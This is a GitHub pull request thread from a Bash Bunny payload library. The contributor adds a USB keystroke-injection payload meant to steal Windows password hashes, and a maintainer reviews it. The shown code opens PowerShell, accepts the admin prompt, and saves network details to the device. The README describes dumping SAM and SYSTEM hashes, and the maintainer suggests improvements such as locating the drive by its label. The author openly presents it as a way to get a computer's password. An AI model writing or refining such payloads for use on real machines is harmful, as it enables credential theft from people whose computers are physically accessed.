-
Notifications
You must be signed in to change notification settings - Fork 1.5k
get your windows password #701
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Conversation
I created a payload that gets the windows password hash
created a README
|
Placing this PR on hold as I am currently away from my hardware and am unable to test. I will follow up with a review soon :) |
| Then it says yes to run as admin. | ||
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
| QUACK DELAY 2200 | ||
| QUACK ALT Y | ||
| QUACK DELAY 1000 | ||
| QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUICK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have powershell use the BashBunny Label to locate the drive letter of the bash bunny and export it as a powershell variable you can then later use for saving files to the BashBunny.
Just as a example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'`
Please make this change across your payload and be mindful for syntax overlaps.
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. | ||
| DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify thing as I did in my code example.
|
Thx I didn’t know to do it at that moment I will look into it at a later date thank you now and thank you in advancedDen 25. nov. 2025 kl. 23.33 skrev Peaks ***@***.***>:
@hak5peaks requested changes on this pull request.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
In payloads/library/phishing/getWINDOWSpassword/payload.txt:
@@ -0,0 +1,28 @@
+ATTACKMODE HID STORAGE
+LED R
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING "exit Start-Process powershell -Verb RunAs"
+QUACK ENTER
+QUACK DELAY 2200
+QUACK ALT Y
+QUACK DELAY 1000
+QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'"
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUICK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have powershell use the BashBunny Label to locate the drive letter of the bash bunny and export it as a powershell variable you can then later use for saving files to the BashBunny.
Just as a example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'`
Please make this change across your payload and be mindful for syntax overlaps.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
+DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny.
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify thing as I did in my code example.
—Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you authored the thread.Message ID: ***@***.***>
|
Hi I made this so you can get a computers password this only works on Windows.
And I just want to say have a great day.